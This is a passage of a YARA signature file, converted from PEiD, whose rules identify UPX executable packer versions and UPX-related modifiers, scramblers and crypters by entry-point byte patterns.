00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 10 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 29 D9 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 11 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 89 E8 B3 01 56 89 FE 29 C6 F3 A4 5E EB 8E 00 D2 75 05 8A 16 46 10 D2 C3 31 C9 41 E8 EE FF FF FF 11 C9 E8 E7 FF FF FF 72 F2 C3 31 C0 31 DB 31 C9 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 89 D8 E2 D9 8D BE ?? ?? ?? ?? 8B 07 09 C0 74 45 8B 5F 04 8D 84 30 ?? ?? ?? ?? 01 F3 50 83 C7 08 FF 96 ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 79 07 0F B7 07 47 50 47 B9 57 48 F2 AE 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB D8 FF 96 ?? ?? ?? ?? 61 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PackerUPX_CompresorGratuito_wwwupxsourceforgenet: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?0 ?? 00 8D BE ?? ?? F? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_071_072_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE EF 00 00 FF 57 66 81 87 00 00 00 00 00 00 81 C6 B1 01 00 00 EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_dos_exe_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? 89 F7 1E A9 ?? ?? 8C C8 05 ?? ?? 8E D8 05 ?? ?? 8E C0 FD F3 A5 FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_One_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? 00 B9 ?? 01 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_MANtiCORE_: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Alternative_stub_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 EB EA EB FC 8A 06 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v072_Hint_DOS_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 83 ?? ?? 31 DB 5E 8D ?? ?? ?? ?? ?? 57 66 ?? ?? ?? ?? ?? ?? ?? ?? 81 ?? ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v11_CyberDoom_Bob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? 00 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_10_12_CyberDoom_Team_X_BoB_BobSoft: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_sibaway7yahoocom: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_UPX_0896_102_105_124_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 90 8B 00 8D BE 00 80 B4 FF 57 83 CD FF EB 3A 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 0B 75 19 8B 1E 83 EE FC 11 DB 72 10 58 61 90 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_V3042005_MANtiCORE_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? ?? ?? ?? ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Upx_Lock_v10_CyberDoom_Team_X: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 48 12 40 00 60 E8 2B 03 00 00 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB 07 8B 1E 83 EE FC 11 DB ED B8 01 ?? ?? ?? 01 DB 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 }\r\n        $b = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_p_ECLiPSE_layer_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 D2 EB 01 0F 56 EB 01 0F E8 03 00 00 00 EB 01 0F EB 01 0F 5E EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_120_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_124_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 31 2E 32 34 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modifier_v01x: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Modified_stub_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 50 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Simple_UPX_Cryptor_v3042005_multi_layer_encryption: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1 }\r\n        $b = { 60 B8 ?? ?? ?? 00 B9 18 00 00 00 80 34 08 ?? E2 FA 61 68 ?? ?? ?? 00 C3 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPXHiT_v001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v060_v061: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 58 83 E8 3D 50 8D B8 FF 57 66 81 87 8D B0 F0 01 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 }\r\n        $b = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_293_LZMA: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_wwwupxsourceforgenet_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? 00 8D BE ?? ?? ?? FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_051_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 D8 01 00 00 83 CD FF 31 DB 90 90 90 90 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90 90 90 B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 }\r\n        $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084: PEiD\r\n{\r\n    strings:\r\n        $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n        $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n        $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_102_PE: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_030_EXE: PEiD\r\n{\r\n    strings:\r\n        $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 04 03 02 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001: PEiD\r\n{\r\n    strings:\r\n        $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_PE_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 1A 00 00 00 8D BE E6 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Delphi_stub_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_Markus_Laszlo: PEiD\r\n{\r\n    strings:\r\n        $a = { 32 2E 30 30 00 55 50 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_DJ_Siba: PEiD\r\n{\r\n    strings:\r\n        $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n        $b = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 20 5B 35 30 30 6D 68 7A 5D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v070_Laszlo_Markus: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n    strings:\r\n        $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n        $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 